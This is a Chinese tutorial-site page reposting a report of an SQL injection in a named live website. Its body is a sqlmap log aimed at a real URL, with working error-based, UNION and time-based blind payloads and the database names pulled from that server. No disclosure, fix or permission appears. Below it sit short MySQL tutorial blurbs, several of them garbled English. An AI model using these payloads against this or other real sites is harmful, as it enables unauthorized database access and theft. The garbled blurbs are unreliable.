我拉网主站一处sql注入_MySQL-mysql教程-PHP中文网

首页

数据库

mysql教程

我拉网主站一处sql注入_MySQL

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 01, 2016 pm 01:12 PM

我拉网主站一处sql注入

注入点

<code>http://www.55.la/run/ding_banner.php?bid=21022</code>

<code>注入地址:http://www.55.la/run/ding_banner.php?bid=21022<br><br>	sqlmap/1.0-dev - automatic SQL injection and database takeover tool<br>	http://www.sqlmap.org<br><br>[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual<br> consent is illegal. It is the end user's responsibility to obey all applicable<br>local, state and federal laws. Authors assume no liability and are not responsib<br>le for any misuse or damage caused by this program<br><br>[*] starting at 02:04:07<br><br>[02:04:07] [INFO] using 'C:/Users/Administrator/Desktop/渗透工具/sqlmap GUI汉化<br>版/rar/output/www.55.la/session' as session file<br>[02:04:07] [INFO] testing connection to the target url<br>[02:04:07] [INFO] testing if the url is stable, wait a few seconds<br>[02:04:08] [INFO] url is stable<br>[02:04:08] [INFO] testing if GET parameter 'bid' is dynamic<br>[02:04:09] [INFO] confirming that GET parameter 'bid' is dynamic<br>[02:04:09] [INFO] GET parameter 'bid' is dynamic<br>[02:04:09] [INFO] heuristic test shows that GET parameter 'bid' might be injecta<br>ble (possible DBMS: MySQL)<br>[02:04:09] [INFO] testing sql injection on GET parameter 'bid'<br>[02:04:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'<br>[02:04:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>'<br>[02:04:11] [INFO] GET parameter 'bid' is 'MySQL >= 5.0 AND error-based - WHERE o<br>r HAVING clause' injectable<br>[02:04:11] [INFO] testing 'MySQL > 5.0.11 stacked queries'<br>[02:04:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'<br>[02:04:21] [INFO] GET parameter 'bid' is 'MySQL > 5.0.11 AND time-based blind' i<br>njectable<br>[02:04:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'<br>[02:04:24] [INFO] target url appears to be UNION injectable with 1 columns<br>[02:04:25] [INFO] GET parameter 'bid' is 'MySQL UNION query (NULL) - 1 to 10 col<br>umns' injectable<br>GET parameter 'bid' is vulnerable. Do you want to keep testing the others (if an<br>y)? [y/N] y<br>sqlmap identified the following injection points with a total of 32 HTTP(s) requ<br>ests:<br>---<br>Place: GET<br>Parameter: bid<br>	Type: error-based<br>	Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br>	Payload: bid=21022' AND (SELECT 3637 FROM(SELECT COUNT(*),CONCAT(0x3a6f636a3<br>a,(SELECT (CASE WHEN (3637=3637) THEN 1 ELSE 0 END)),0x3a7862753a,FLOOR(RAND(0)*<br>2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uYVe'='uYVe<br><br>	Type: UNION query<br>	Title: MySQL UNION query (NULL) - 1 column<br>	Payload: bid=-1700' UNION SELECT CONCAT(0x3a6f636a3a,0x676e4261505364745265,<br>0x3a7862753a)# AND 'EXgA'='EXgA<br><br>	Type: AND/OR time-based blind<br>	Title: MySQL > 5.0.11 AND time-based blind<br>	Payload: bid=21022' AND SLEEP(5) AND 'xros'='xros<br>---<br><br>[02:04:27] [INFO] the back-end DBMS is MySQL<br><br>web application technology: Nginx, PHP 5.3.24<br>back-end DBMS: MySQL 5.0<br>[02:04:27] [INFO] fetching database names<br>[02:04:30] [INFO] the SQL query used returns 5 entries<br>[02:04:30] [INFO] retrieved: "information_schema"<br>[02:04:37] [INFO] retrieved: "help55la"<br>[02:04:37] [INFO] retrieved: "test"<br>[02:04:37] [INFO] retrieved: "u_run55_la"<br>[02:04:37] [INFO] retrieved: "wstp8_com"<br>available databases [5]:<br>[*] help55la<br>[*] information_schema<br>[*] test<br>[*] u_run55_la<br>[*] wstp8_com<br><br>[02:04:37] [INFO] Fetched data logged to text files under 'C:/Users/Administrato<br>r/Desktop/渗透工具/sqlmap GUI汉化版/rar/output/www.55.la'<br><br>[*] shutting down at 02:04:37</code>

声明

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

将用户添加到MySQL：完整的教程May 12, 2025 am 12:14 AM

掌握添加MySQL用户的方法对于数据库管理员和开发者至关重要，因为它确保数据库的安全性和访问控制。1)使用CREATEUSER命令创建新用户，2)通过GRANT命令分配权限，3)使用FLUSHPRIVILEGES确保权限生效，4)定期审计和清理用户账户以维护性能和安全。

掌握mySQL字符串数据类型：varchar vs.文本与charMay 12, 2025 am 12:12 AM

chosecharforfixed-lengthdata，varcharforvariable-lengthdata，andtextforlargetextfield.1）chariseffity forconsistent-lengthdatalikecodes.2）varcharsuitsvariable-lengthdatalikenames，ballancingflexibilitibility andperformance.3）

MySQL：字符串数据类型和索引：最佳实践May 12, 2025 am 12:11 AM

在MySQL中处理字符串数据类型和索引的最佳实践包括：1)选择合适的字符串类型，如CHAR用于固定长度，VARCHAR用于可变长度，TEXT用于大文本；2)谨慎索引，避免过度索引，针对常用查询创建索引；3)使用前缀索引和全文索引优化长字符串搜索；4)定期监控和优化索引，保持索引小巧高效。通过这些方法，可以在读取和写入性能之间取得平衡，提升数据库效率。

mysql：如何远程添加用户May 12, 2025 am 12:10 AM

ToaddauserremotelytoMySQL,followthesesteps:1)ConnecttoMySQLasroot,2)Createanewuserwithremoteaccess,3)Grantnecessaryprivileges,and4)Flushprivileges.BecautiousofsecurityrisksbylimitingprivilegesandaccesstospecificIPs,ensuringstrongpasswords,andmonitori

MySQL字符串数据类型的最终指南：有效的数据存储May 12, 2025 am 12:05 AM

tostorestringsefliceflicyInmySql，ChooSetherightDataTypeBasedyOrneOrneEds：1）USEcharforFixed-LengthStstringStringStringSlikeCountryCodes.2）UseVarcharforvariable-lengtthslikenames.3）USETEXTCONTENT.3）

MySQL：字符串数据类型可用哪些字符集？May 10, 2025 am 12:07 AM

mysqloffersvariouscharactersetsforstringdatatypes：1）latin1 forwesterneuropeanlanguages，2）utf8 formultingualsupport，3）utf8mb4f OREXTEDENDENDENENICODECLUDINGEMOJIS，4）UCS2FORIXED-WIDTHENCODING，5）assiiforbasiclatin.ChoosideStherightStetSetensensersdaintegrity

mysql：斑点流比存储它们更好吗？May 10, 2025 am 12:06 AM

流式传输BLOB确实比直接存储更好，因为它能减少内存使用和提高性能。1）通过逐步读取和处理文件，避免了数据库膨胀和性能下降。2）流式传输需要更复杂的代码逻辑，且可能增加I/O操作次数。

MySQL字符串类型：存储，性能和最佳实践May 10, 2025 am 12:02 AM

mySqlStringTypesimpactStorageAndPerformanCeaseAsfollows：1）长度，始终使用theSamestoragespace，whatcanbefasterbutlessspace-felfficity.2）varCharisvariable varcharisvariable length，morespace-morespace-morespace-effficitybuteftife buteftife butfority butfority textifforlyslower.3）

See all articles